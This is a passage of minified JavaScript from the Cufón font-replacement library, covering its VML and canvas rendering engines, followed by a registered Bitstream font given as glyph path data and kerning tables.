F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());;
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Copyright 1990-1998 Bitstream Inc.  All rights reserved.
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"18,0r-27,0r99,-256r31,0r99,256r-27,0r-31,-80r-114,0xm153,-103r-48,-129r-48,129r96,0xm88,-321v21,0,44,20,53,-4r15,0v-5,36,-42,34,-72,23v-8,1,-13,6,-16,13r-14,0v4,-18,14,-32,34,-32","w":214},{"d":"101,-40r-24,0r43,-57r-43,-56r24,0r43,56xm47,-40r-24,0r44,-57r-44,-56r24,0r44,56","w":164,"k":{"\u0142":6,"\uf002":6,"\uf001":6,"\u00c5":13,"z":13,"y":10,"x":20,"w":20,"v":20,"u":6,"t":13,"r":6,"p":6,"n":6,"m":6,"l":6,"k":6,"i":6,"h":6,"f":6,"b":6,"Z":13,"Y":40,"X":33,"W":26,"V":33,"U":6,"T":26,"S":13,"J":13,"A":13}},{"d":"102,-239v-39,0,-62,27,-62,68v0,72,-11,154,62,154v72,0,61,-83,61,-155v0,-40,-22,-67,-61,-67xm102,5v-56,0,-88,-33,-87,-95r0,-76v-1,-64,31,-92,87,-95v85,-4,86,83,86,172v0,62,-31,94,-86,94","w":203},{"d":"81,-181r-25,0r27,-75r25,0xm29,-181r-25,0r27,-75r26,0","w":121},{"d":"98,-94r0,94r-25,0r0,-94r-82,-162r29,0r66,133r66,-133r28,0xm106,-293r0,-29r25,0r0,29r-25,0xm41,-293r0,-29r25,0r0,29r-25,0","w":172},{"d":"49,0r-25,0r0,-256r25,0r0,115r122,0r0,-115r25,0r0,256r-25,0r0,-117r-122,0r0,117","w":219,"k":{"\u2019":-7,"\u201d":-7,";":6,":":6,".":6,",":6}},{"d":"20,0r0,-256r25,0r0,256r-25,0","w":65,"k":{"\u2039":6,"\u2019":-13,"\u201d":-13,"\u00ab":6,".":6,",":6}},{"d":"253,-24r0,17r-207,0r0,-17r207,0xm253,-137r0,15r-207,70r0,-18r178,-60r-178,-59r0,-19","w":299},{"d":"47,-40r-24,0r44,-57r-44,-56r24,0r44,56","w":110,"k":{"\u0142":6,"\uf002":6,"\uf001":6,"\u00c5":13,"z":13,"y":10,"x":20,"w":20,"v":20,"u":6,"t":13,"r":6,"p":6,"n":6,"m":6,"l":6,"k":6,"i":6,"h":6,"f":6,"b":6,"Z":13,"Y":40,"X":33,"W":26,"V":33,"U":6,"T":26,"S":13,"J":13,"A":13}},{"d":"18,0r-27,0r99,-256r31,0r99,256r-27,0r-31,-80r-114,0xm153,-103r-48,-129r-48,129r96,0xm99,-281r-16,0r37,-62r26,0","w":214},{"d":"201,-74v30,-1,45,-12,68,-28r0,20v-20,15,-39,23,-68,25v-21,1,-82,-25,-102,-24v-30,2,-44,12,-68,28r0,-20v22,-14,39,-23,68,-25v22,-2,81,26,102,24xm201,-134v30,-2,43,-12,68,-27r0,19v-21,15,-40,24,-68,26v-20,1,-81,-27,-102,-25v-29,3,-43,13,-68,28r0,-20v21,-14,40,-23,68,-25v22,-2,81,26,102,24","w":299},{"d":"41,-281r17,0r32,46r32,-46r17,0r-36,61r-26,0"},{"d":"179,-49r46,-144r27,0r-65,193r-17,0r-45,-147r-45,147r-16,0r-65,-193r26,0r47,144r44,-144r18,0","w":249,"k":{"\u203a":13,"\u2039":20,"\u2019":-20,"\u201d":-20,"\u00bb":13,"\u00ab":20,";":6,":":6,".":26,"-":13,",":26}},{"d":"78,-237v-22,0,-40,19,-40,40v0,21,19,40,40,40v21,0,40,-19,40,-40v0,-21,-18,-40,-40,-40xm79,-135v-35,0,-63,-28,-63,-63v0,-35,28,-63,63,-63v34,0,63,29,63,63v0,35,-28,63,-63,63xm394,-98v-21,0,-40,19,-40,40v0,21,19,40,40,40v22,0,40,-19,40,-40v0,-21,-19,-40,-40,-40xm395,5v-35,0,-63,-28,-63,-63v0,-34,28,-63,63,-63v34,0,63,29,63,63v0,35,-28,63,-63,63xm216,-261r21,0r-137,266r-20,0xm236,-98v-21,0,-40,19,-40,40v0,21,19,40,40,40v21,0,40,-19,40,-40v0,-22,-19,-40,-40,-40xm237,5v-35,0,-64,-28,-64,-63v0,-34,29,-63,64,-63v34,0,63,30,63,63v0,34,-28,63,-63,63","w":473},{"d":"92,-181r-27,-75r25,0r27,75r-25,0xm41,-181r-27,-75r24,0r28,75r-25,0","w":121,"k":{"\u00d0":-7,"\u0142":-13,"\u0141":-7,"\uf002":-20,"\uf001":-20,"\u0152":-10,"\u00d8":-10,"\u00c6":33,"\u00df":-13,"\u00c5":20,"z":-13,"y":-27,"x":-13,"w":-20,"v":-20,"u":-13,"t":-20,"s":-7,"r":-13,"p":-13,"n":-13,"m":-13,"l":-13,"k":-13,"j":-13,"i":-13,"h":-13,"f":-20,"b":-13,"Z":-7,"Y":-17,"X":-7,"W":-20,"V":-20,"U":-7,"T":-7,"S":-10,"R":-7,"Q":-17,"P":-7,"O":-10,"N":-7,"M":-7,"L":-7,"K":-7,"J":46,"I":-7,"H":-7,"G":-10,"F":-7,"E":-7,"D":-7,"C":-10,"B":-7,"A":20}},{"d":"103,5v-120,0,-74,-155,-83,-261r25,0r0,162v-3,49,18,76,57,76v90,0,46,-152,56,-238r25,0v-8,105,34,261,-80,261xm108,-281r-47,-62r26,0r37,62r-16,0","w":203},{"d":"82,-110r83,0r1,-121r-3,0xm65,-85r-58,85r-31,0r176,-256r145,0r0,25r-108,0r0,90r108,0r0,25r-108,0r0,91r108,0r0,25r-133,0r0,-85r-99,0","w":318,"k":{"\u203a":6,"\u2039":6,"\u00bb":6,"\u00ab":6,";":13,":":13,".":6,"-":6,",":6}},{"d":"81,28r-25,0r27,-75r25,0xm29,28r-25,0r27,-75r26,0","w":121,"k":{"\u00c6":-20,"\u00df":-7,"\u00c5":-13,"z":-10,"y":6,"x":-7,"w":13,"v":20,"t":6,"s":-10,"r":-7,"p":-13,"j":-20,"g":-7,"e":-7,"b":-7,"Y":33,"W":26,"V":26,"T":13,"J":-13,"A":-13}},{"d":"138,-273v5,46,-55,57,-83,35v-8,-7,-12,-19,-13,-35r14,0v1,19,14,25,34,25v22,0,32,-6,34,-25r14,0"},{"d":"157,-174v0,-56,-48,-61,-112,-57r0,231r-25,0r0,-256r69,0v61,-2,92,28,95,81v2,38,-26,73,-62,75r62,100r-30,0r-76,-123v45,4,79,-12,79,-51","w":200,"k":{"\u203a":13,"\u2039":20,"\u2019":-8,"\u2018":13,"\u201d":-8,"\u201c":13,"\u0153":6,"\u00bb":13,"\u00ab":20,"\u00f8":6,"\u00e6":6,"o":6,"e":6,"a":6,";":6,":":6,".":20,"-":13,",":20}},{"d":"100,-275r0,360r-19,0r0,-360r19,0"},{"d":"257,-138v-2,54,-25,86,-60,114r60,0r0,24r-102,0r0,-22v42,-25,72,-60,74,-118v2,-57,-36,-102,-90,-102v-55,0,-91,45,-90,102v2,57,32,94,74,118r0,22r-102,0r0,-24r60,0v-34,-28,-59,-60,-60,-114v-2,-72,49,-128,118,-128v69,0,119,57,118,128","w":277},{"d":"29,28r-25,0r27,-75r26,0","w":69,"k":{"\u00c6":-20,"\u00df":-7,"\u00c5":-13,"z":-10,"y":6,"x":-7,"w":13,"v":20,"t":6,"s":-10,"r":-7,"p":-13,"j":-20,"g":-7,"e":-7,"b":-7,"Y":33,"W":26,"V":26,"T":13,"J":-13,"A":-13}},{"d":"48,-34v0,-72,17,-170,-29,-199r0,-28v69,27,53,137,54,231v0,54,-18,89,-54,108r0,-29v24,-19,29,-38,29,-83","w":95},{"d":"72,0r-25,0r0,-47r25,0r0,47xm192,0r-25,0r0,-47r25,0r0,47xm312,0r-25,0r0,-47r25,0r0,47","w":360},{"d":"200,-24r-82,-209r-82,209r164,0xm135,-259r103,259r-240,0r104,-259r33,0","w":236},{"d":"63,-40r-43,-57r43,-56r25,0r-44,56r44,57r-25,0","w":110,"k":{"\u0111":6,"\uf002":6,"\uf001":6,"\u0153":6,"\u00f8":6,"\u00e6":6,"x":13,"w":13,"v":13,"t":10,"o":6,"j":-7,"g":6,"f":6,"e":6,"d":6,"c":6,"a":6,"Z":6,"Y":26,"X":13,"W":20,"V":26,"U":10,"T":20,"J":6}},{"d":"125,-24v-14,35,-86,38,-100,1r-20,98r-25,0r56,-262r24,0v-7,43,-20,81,-24,128v-4,47,54,55,77,24v26,-35,31,-103,45,-152r24,0r-33,159v0,10,8,12,19,11v-3,11,0,21,-19,21v-18,0,-25,-9,-24,-28","w":195},{"d":"-39,5r-21,0r159,-266r21,0","w":60},{"d":"37,-129v0,85,101,145,169,87v19,-15,30,-34,36,-58r-129,0r0,-23r159,0v-2,71,-59,128,-131,128v-73,0,-130,-61,-130,-135v0,-102,109,-163,200,-113v20,11,35,29,47,51r-31,0v-20,-26,-43,-44,-84,-45v-57,-1,-106,50,-106,108xm190,-335v5,46,-55,57,-83,35v-8,-7,-12,-19,-13,-35r14,0v1,19,14,25,34,25v22,0,32,-6,34,-25r14,0","w":283},{"d":"191,-95v0,-44,-34,-80,-75,-80v-39,0,-72,37,-72,78v0,39,35,79,73,79v40,0,74,-36,74,-77xm117,5v-34,0,-59,-15,-73,-36r0,94r-25,0r0,-319r25,0r0,94v13,-20,40,-36,71,-36v57,-1,102,44,102,100v0,58,-43,103,-100,103","w":226},{"d":"171,-152r-46,0r-17,49r47,0xm161,-256r-29,85r46,0r30,-85r23,0r-30,85r55,0r-6,19r-56,0r-17,49r60,0r-7,19r-60,0r-30,84r-22,0r30,-84r-47,0r-31,84r-22,0r30,-84r-57,0r6,-19r58,0r17,-49r-62,0r6,-19r63,0r30,-85r22,0","w":276},{"d":"112,50v1,-17,-14,-19,-33,-18r0,-32r11,0r0,20v25,-1,42,7,42,30v1,39,-54,33,-84,24r0,-14v23,4,62,16,64,-10"},{"d":"115,-132v-10,62,0,152,-32,191v-10,12,-31,16,-56,15r2,-24v33,1,45,-5,48,-36r13,-146r-45,0r2,-24r45,0v5,-61,5,-113,79,-104r-2,23v-53,-13,-47,39,-52,81r45,0r-2,24r-45,0","w":203},{"d":"205,-284v6,37,-31,78,-58,68v-2,-36,27,-63,58,-68xm224,-130v0,31,18,49,41,59v-21,43,-30,70,-72,77v-9,1,-35,-13,-45,-11v-9,-2,-37,13,-45,11v-54,-12,-79,-76,-83,-136v-3,-49,32,-86,79,-86v13,0,39,12,49,12v34,-14,91,-17,111,16v-20,14,-35,28,-35,58","w":284},{"d":"73,-259v21,0,44,20,53,-4r15,0v-5,36,-42,34,-72,23v-8,1,-13,6,-16,13r-14,0v4,-18,14,-32,34,-32"},{"d":"224,-288r0,13r-22,0r-104,282r-7,0r-58,-158r-20,7r-3,-10r43,-15r48,131r92,-250r31,0","w":224},{"d":"119,0r-27,0r0,-234r-45,0r0,-22r72,0r0,256","w":203},{"d":"49,0r-26,0r0,-256r26,0r0,256xm23,-294r0,-31r26,0r0,31r-26,0","w":72},{"d":"226,-195r-36,46r65,0r0,17r-76,0r-37,49r113,0r0,17r-124,0r-45,57r-13,-11r36,-46r-64,0r0,-17r75,0r38,-49r-113,0r0,-17r124,0r44,-56","w":299},{"d":"78,-102r-17,0r0,-141r-30,0r0,-13r47,0r0,154","w":134},{"d":"9,-259r215,0r0,25r-179,0r124,135r-130,143r186,0r0,25r-223,0r0,-23r131,-145r-124,-135r0,-25","w":231},{"d":"18,0r-27,0r99,-256r31,0r99,256r-27,0r-31,-80r-114,0xm153,-103r-48,-129r-48,129r96,0xm56,-281r36,-62r26,0r36,62r-17,0r-32,-47r-32,47r-17,0","w":214},{"d":"49,-141r108,0r0,25r-108,0r0,91r108,0r0,25r-133,0r0,-256r133,0r0,25r-108,0r0,90xm44,-281r36,-62r26,0r36,62r-17,0r-32,-47r-32,47r-17,0"},{"d":"49,-141r108,0r0,25r-108,0r0,91r108,0r0,25r-133,0r0,-256r133,0r0,25r-108,0r0,90","k":{"\u203a":6,"\u2039":6,"\u00bb":6,"\u00ab":6,";":13,":":13,".":6,"-":6,",":6}},{"d":"205,-129v0,-82,-62,-113,-154,-103r0,92r63,0r0,23r-63,0r0,93r59,0v59,0,95,-44,95,-105xm232,-127v-5,80,-46,130,-139,127r-67,0r0,-117r-27,0r0,-23r27,0r0,-116r77,0v75,-1,133,55,129,129","w":242,"k":{"\u201e":20,"\u201a":20,"\u2019":-10,"\u2018":6,"\u201d":-10,"\u201c":6,";":6,":":6,".":20,"-":-7,",":20}},{"d":"10,-96v0,-91,127,-138,172,-66r0,-31r25,0r0,256r-25,0r0,-92v-14,20,-41,34,-73,34v-55,1,-99,-45,-99,-101xm110,-18v40,0,73,-39,73,-80v0,-39,-35,-77,-72,-77v-41,0,-75,36,-75,80v0,42,34,77,74,77","w":226,"k":{"\u2039":6,"\u2019":-13,"\u2018":6,"\u201d":-13,"\u201c":6,"\u00ab":6,".":6,",":6}},{"d":"95,-106v59,19,37,111,-26,111v-37,0,-61,-28,-61,-66v8,1,19,-2,25,1v-6,47,70,57,70,10v0,-54,-95,-33,-87,-94v-3,-46,63,-72,95,-40v10,9,15,22,16,39r-26,0v-2,-18,-12,-28,-31,-29v-29,-1,-37,42,-13,54v9,5,26,10,38,14xm92,50v1,-17,-14,-19,-33,-18r0,-32r11,0r0,20v25,-1,42,7,42,30v1,39,-54,33,-84,24r0,-14v23,4,62,16,64,-10","w":140},{"d":"165,-256r29,75r27,-75r21,0r0,94r-13,0r0,-83r-31,83r-8,0r-33,-83r0,83r-13,0r0,-94r21,0xm122,-256r0,10r-30,0r0,84r-15,0r0,-84r-31,0r0,-10r76,0","w":299},{"d":"99,-108r0,23r-82,0r0,-23r82,0","w":115},{"d":"84,-219r-16,0r37,-62r26,0"},{"d":"44,28r-26,0r28,-75r25,0xm64,-193r0,46r-25,0r0,-46r25,0","w":103},{"d":"22,-63v0,-64,90,-109,110,-41v4,-38,14,-107,-23,-112v-15,-2,-39,44,-50,13v1,-17,20,-29,39,-27v103,9,72,235,-19,235v-35,0,-57,-31,-57,-68xm79,-4v30,0,47,-41,46,-77v0,-26,-8,-46,-31,-46v-31,0,-47,41,-46,79v1,27,7,44,31,44","w":181},{"d":"8,43v-2,-22,32,-27,38,-8v1,3,1,14,6,13v12,0,17,-42,20,-126v4,-91,-4,-183,65,-194v29,-5,40,42,9,42v-14,3,-20,-20,-24,-25v-12,0,-16,37,-20,110v-5,95,8,201,-66,210v-15,2,-27,-9,-28,-22","w":173},{"d":"106,-82v-28,0,-52,-24,-52,-52v0,-28,24,-52,52,-52v28,0,52,24,52,52v0,28,-24,52,-52,52","w":212},{"d":"255,-26r0,17r-210,0r0,-17r210,0xm159,-205r0,61r96,0r0,17r-96,0r0,61r-17,0r0,-61r-97,0r0,-17r97,0r0,-61r17,0","w":299},{"d":"111,-199v60,0,100,48,99,110r-175,0v3,40,32,71,74,71v32,0,55,-20,66,-43r28,0v-15,38,-45,65,-93,66v-55,2,-101,-47,-101,-102v0,-57,44,-102,102,-102xm182,-110v-4,-58,-77,-85,-122,-48v-13,12,-21,28,-24,48r146,0xm62,-219r36,-62r26,0r36,62r-17,0r-32,-47r-32,47r-17,0","w":218},{"d":"81,-244v-29,-1,-54,26,-54,56v0,31,24,54,55,54v31,0,55,-24,55,-55v0,-32,-26,-55,-56,-55xm82,-117v-40,0,-75,-32,-75,-71v0,-39,36,-72,74,-72v40,0,77,33,76,70v0,40,-34,73,-75,73","w":163},{"d":"77,-232r0,-31r26,0r0,31r-26,0"},{"d":"95,-106v59,19,37,111,-26,111v-37,0,-61,-28,-61,-66v8,1,19,-2,25,1v-6,47,70,57,70,10v0,-54,-95,-33,-87,-94v-3,-46,63,-72,95,-40v10,9,15,22,16,39r-26,0v-2,-18,-12,-28,-31,-29v-29,-1,-37,42,-13,54v9,5,26,10,38,14xm21,-281r17,0r32,46r32,-46r17,0r-36,61r-26,0","w":140},{"d":"376,-60v-16,66,-127,88,-169,33r0,27r-25,0r0,-27v-18,20,-38,32,-73,32v-55,0,-99,-46,-99,-101v0,-90,119,-136,172,-70r0,-27r25,0r0,28v19,-20,42,-32,77,-33v60,0,100,47,98,110r-173,0v-2,75,117,94,139,28r28,0xm356,-110v-5,-56,-77,-86,-122,-48v-13,12,-20,28,-24,48r146,0xm110,-18v40,0,73,-39,73,-80v0,-39,-35,-77,-72,-77v-41,0,-75,37,-75,80v0,42,34,77,74,77","w":391,"k":{"\u203a":6,"\u2018":26,"\u201c":26,"\u00bb":6,";":6,":":6,".":13,",":13}},{"d":"92,-235v-71,1,-41,104,-47,172r24,0v7,60,104,56,105,-5v-1,-42,-37,-56,-85,-53v1,-6,-2,-16,1,-20v31,0,50,-16,50,-47v0,-28,-20,-48,-48,-47xm120,5v-42,-1,-62,-22,-75,-56r0,51r-25,0r0,-170v0,-56,19,-88,73,-88v66,0,102,90,47,116v35,7,60,29,60,69v1,43,-35,80,-80,78","w":210,"k":{"\u203a":6,"\u2019":6,"\u2018":26,"\u201d":6,"\u201c":26,"\u00bb":6,";":6,":":6,".":13,"-":-7,",":13}},{"d":"107,-176v-40,0,-72,38,-72,79v0,42,33,79,75,79v42,0,73,-37,73,-79v0,-44,-32,-79,-76,-79xm110,5v-55,0,-101,-47,-101,-102v0,-54,46,-103,99,-103v54,0,101,48,101,101v0,56,-44,104,-99,104xm62,-219r36,-62r26,0r36,62r-17,0r-32,-47r-32,47r-17,0","w":218},{"d":"-7,-256r25,0r81,218r81,-218r25,0r-96,256r-20,0","w":200,"k":{"\u201e":33,"\u201a":33,"\u203a":26,"\u2039":33,"\u2019":-20,"\u2018":-20,"\u201d":-20,"\u201c":-20,"\u0153":20,"\u00bb":26,"\u00ab":33,"\u00f8":20,"\u00e6":20,"\u00c5":10,"y":6,"u":11,"o":20,"e":20,"a":20,"A":10,";":13,":":13,".":40,"-":20,",":40}},{"d":"75,0r-28,0r101,-231r-112,0r0,-25r141,0r0,23","w":203},{"d":"192,-161v0,-32,-38,-26,-70,-27r0,53v32,-1,70,5,70,-26xm215,-162v-1,21,-15,36,-35,39r33,68r-25,0r-32,-65r-34,0r0,65r-23,0r0,-148v51,1,117,-10,116,41xm150,-13v69,0,115,-46,115,-114v0,-69,-46,-115,-115,-115v-68,0,-115,47,-115,115v0,67,46,114,115,114xm21,-127v0,-76,52,-129,129,-129v78,0,129,52,129,129v0,77,-53,129,-129,129v-77,0,-129,-53,-129,-129","w":299},{"d":"20,0r0,-193r25,0r0,193r-25,0xm27,-219r-16,0r37,-62r26,0","w":65},{"d":"39,-256r25,0r0,47r-25,0r0,-47xm39,-189r25,0r0,189r-25,0r0,-189","w":103},{"w":203},{"d":"103,5v-120,0,-74,-155,-83,-261r25,0r0,162v-3,49,18,76,57,76v90,0,46,-152,56,-238r25,0v-8,105,34,261,-80,261xm122,-293r0,-29r25,0r0,29r-25,0xm57,-293r0,-29r25,0r0,29r-25,0","w":203},{"d":"-6,-193r29,0r59,157r63,-157r29,0r-105,256r-26,0r26,-63xm77,-219r-16,0r37,-62r26,0","w":165},{"d":"96,-219r-47,-